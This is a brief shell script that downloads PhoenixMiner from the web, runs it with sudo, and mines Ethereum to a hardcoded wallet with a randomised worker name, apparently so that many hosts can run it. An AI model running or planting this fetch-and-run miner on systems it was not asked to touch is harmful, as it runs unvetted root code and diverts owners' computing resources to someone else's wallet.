#!/bin/sh
apt-get install libpci3 && wget https://phoenixminer.info/downloads/PhoenixMiner_5.6d_Linux.tar.gz && tar -xf PhoenixMiner_5.6d_Linux.tar.gz && cd PhoenixMiner_5.6d_Linux && sudo ./PhoenixMiner -pool us.ethereum.herominers.com:1147 -wal 0xd094e3013e2c70504d6b212a0ff6494a317e93a4.$(echo $(shuf -i 1-70 -n 1)-Phoenix#ln9q-3xm0) -pass x -mi 14 -gt 400
